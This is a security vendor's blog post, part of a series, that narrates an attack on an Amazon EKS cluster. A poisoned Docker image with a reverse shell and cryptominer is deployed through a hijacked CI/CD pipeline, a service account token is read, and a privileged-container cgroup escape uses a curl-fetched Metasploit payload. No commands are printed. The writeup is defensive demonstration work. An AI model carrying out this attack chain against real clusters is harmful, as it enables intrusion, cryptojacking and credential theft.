Every Solution You Can Imagine – and More
What cybersecurity solution do you need? From Zero Trust to ADR, IAM, risk/privacy, data protection, AppSec and threat, securing digital transformation, to resiliency and remediation, we can build the right program to help solve your challenges.
A Single Partner for Everything You Need
Optiv works with more than 450 world-class security technology partners. By putting you at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can.
We Are Optiv
Greatness is every team working toward a common goal. Winning in spite of cyber threats and overcoming challenges in spite of them. It’s building for a future that only you can create or simply coming home in time for dinner.
However you define greatness, Optiv is in your corner. We manage cyber risk so you can secure your full potential.
Anatomy of a Kubernetes Attack - How Untrusted Docker Images Fail Us
PART TWO OF A SERIES.
In the first part of this blog series, Infrastructure as Code: Terraform, AWS EKS, Gitlab & Prisma Cloud, I went through the scenario of building out an Amazon EKS cluster using Terraform and a VCS integration with Gitlab. I also covered an initial Daemonset deployment of the Palo Alto Networks Prisma agent to the nodes on the newly provisioned cluster. In the second part of this series, we will look at some aspects of a Kubernetes attack and in a follow-up installment, how Palo Alto Networks Prisma Compute can be used to prevent related Kubernetes attacks.
Microsoft recently released a Kubernetes attack matrix (similar to MITRE’s ATT&CK framework) that I feel is a good reference for walking through some of the aspects of an example Kubernetes attack. For this blog, I’ll be covering techniques in Initial Access, Execution, Persistence and Privilege Escalation Tactic phases.
Figure 1: Microsoft Kubernetes ATT&CK Matrix
The environment I’m using for this blog is an Amazon EKS cluster with no Prisma agents installed to demonstrate the various stages of an attack. I also have a second EKS cluster that is running Prisma that I’ll use in the next blog to demonstrate how Prisma can protect the cluster. The CI/CD pipeline I’m using incorporates Gitlab Enterprise and a public Docker image repository. The C2 being used is from a Metasploit console, also hosted in AWS.
Figure 2: Vulnerable Amazon EKS Cluster
Imagine a scenario where a software developer unknowingly had their workstation compromised. During the breach, the attacker was able to collect the dev’s version control system (VCS) credentials. With the dev’s stolen credentials, the attacker plans to use the CI/CD pipeline to deploy a poisoned docker image to the Kubernetes cluster. This could either be done by backdooring a trusted image and pushing the updated image to the trusted repository (as was done previously by Optiv’s Dan Kiraly in his Azure container breakout blog series) or by changing a callout in the CI/CD build code to pull the image from a different source, which in my case, is a poisoned image from a public repository at Docker Hub.
In the scenario, I will be working through deployment of the poisoned image into the cluster. This will provide a foothold for an attacker to establish a beachhead and escalate privileges, depending on how the K8s cluster and it’s corresponding pods were deployed.
Figure 2: Docker Hub poisoned image
Figure 3: Changing the image repo path in gitlab-ci.yml from a trusted source to Github
The poisoned image was created offline and pushed to a publicly accessible Docker repo (see above). In this image, I’ve pulled Ubuntu:Latest from Docker and loaded the necessary prerequisites, including curl, a reverse listener binary and cryptocurrency mining software, XMRig. Once the image functions as expected, I pushed the image to my Docker repo.
In the image Figure 3 above, it shows that I’ve changed the image path in the app’s Gitlab CI file from the trusted Gitlab/Ubuntu:Latest location to a poisoned image available at optivrd/ubuntu:latest, located on Docker Hub. The next time a deployment process is triggered in the CI/CD pipeline, the poisoned image at Docker will be called and attached to the deployed container.
The poisoned image being used contains an embedded reverse listener that will connect back to my Metasploit console and provides a shell when the container is deployed. Another option to get the binary on the image could be modifying the dockerfile in the CI/CD pipeline to either download the file externally via CMD upon container deployment or uploading the file for inclusion in the filesystem during the CI/CD build process.
Figure 4: Reverse listener session established through Metasploit
Figure 5: Session established with container spawned from poisoned Docker Image containing crypto-currency miner
Figure 6: Listing of the / partition of container and “whoami” command
We can see from the images above that the container has spawned a connection back to the Metasploit console. With some additional recon, we see that the file system is indeed a container-related system (note the .dockerenv located in /). We can also see from the “whoami” command that the container is running as root.
Attackers who have gotten partial access to a Kubernetes cluster can use existing weaknesses in the design and deployment of the cluster to establish persistence for their access. Some issues can include overly permissive permissions and lack of utilizing native RBAC. In this scenario, the attacker modified the code in the CI/CD pipeline to attach a poisoned image during the container deployment process. Now the attacker is provided access to the cluster every time a container with the poisoned image is deployed.
Armed with access and inherited permissions, an attacker could potentially capture the contents of the service account token mounted in the container. In our case, depending on how the container was deployed (e.g. privileged, separate service account, separate namespace), we may be able to get this useful information.
Figure 7: Directory listing of /run/secrets/Kubernetes.io/serviceaccount
From the directory listing image above, we can see that every file and folder on the container filesystem is owned by root. This indicates that either the container is running as privileged or the container is running as the root user, in either case, a bad practice. In checking the path at “/run/secrets/Kubernetes.io/serviceaccount”, we can see that the CA cert, namespace and token are available to us. Even with this information, we will still not be able to connect to the EKS API server due to us needing the additional AWS API credentials, specifically the API Access Key ID and Secret Access Key, which are needed by awscli for Kubectl to connect directly.
In cases where the API server is deployed and configured by the end user (as opposed to Amazon EKS, Azure AKS and Google GKS managed Kubernetes services) the CA cert, namespace and token information would be all that was needed to connect to the API server using kubectl.
Some other examples of risky permissions for Kubernetes includes listing secrets, service accounts with privileged permissions, user impersonation and the ability to brute force token IDs using default service accounts. With that in mind, it should be noted that securing K8s clusters is a non-trivial exercise and is also difficult to maintain administratively. For example, on a default installation of kubeadm, there are approximately 43 RoleBindings\ClusterRoleBindings, 51 Roles\ClusterRoles and 39 subjects. More information about container security issues and recommendations can be found at NIST SP 800-190.
With my reverse listener session established, I now move onto escalating my foothold to the underlying hosts/nodes in the Kubernetes cluster. For this phase, I’ll exploit a vulnerability discovered by security researcher Felix Wilhelm and expanded on by the folks at Trail of Bits. This vulnerability affects docker containers run with the –privileged flag set and works by abusing the Linux cgroup “notification on release” feature. As this vulnerability demonstrates, launching privileged docker containers is dangerous and should be avoided for almost all scenarios, due to the full access to the host devices and the lack of restrictions from seccomp, AppArmor and other Linux safeguards.
Inside the docker container, I run the commands to escape the container. Included in the commands is a curl request to download my Metasploit reverse listener, set the executable bit and execute the commands on the underlying host.
Figure 8: Running the container breakout command
After running the command in the container’s shell, the Metasploit console shows that a host has connected back and a new session has been established. By running the command “uname -a”, I can see from the kernel version and information provided that this is one of my Kubernetes nodes, not the container. I also see that a .dockerenv file is not present in the root of the filesystem. Finally, I can see the shell-x64.elf binary that was downloaded and used for a connection back to my MSF console.
Figure 9: Directory listing of the Kubernetes host after the container breakout
With access to the underlying Kubernetes hosts, I can continue moving through the different phases of the attack framework including Defense Evasion, Credential Access, Discovery and Lateral Movement. My activity could potentially include wiping logs and establishing a more permanent presence on the nodes.
Hopefully this post helped you understand how a single workstation breach could impact an organization’s CI/CD pipeline and infrastructure. In the next blog installment, I’ll be looking at the techniques covered in this attack and demonstrate how Palo Alto Networks Prisma Compute can help to address issues in the CI/CD pipeline and Kubernetes cluster.
Copyright © 2023 Optiv Security Inc. All rights reserved.
No license, express or implied, to any intellectual property or other content is granted or intended hereby.
This blog is provided to you for information purposes only. While the information contained in this site has been obtained from sources believed to be reliable, Optiv disclaims all warranties as to the accuracy, completeness or adequacy of such information.
Links to third party sites are provided for your convenience and do not constitute an endorsement by Optiv. These sites may not have the same privacy, security or accessibility standards.
Complaints / questions should be directed to Legal@optiv.com
March 24, 2020
Is a container breakout to access the Kubernetes node possible? How might it work?
March 31, 2020
This container compromise scenario is difficult, but very plausible.
February 20, 2020
Container technologies allow developers to assemble code and associated dependencies into a single package or container image.
Let us know what you need, and we will have an Optiv professional contact you shortly.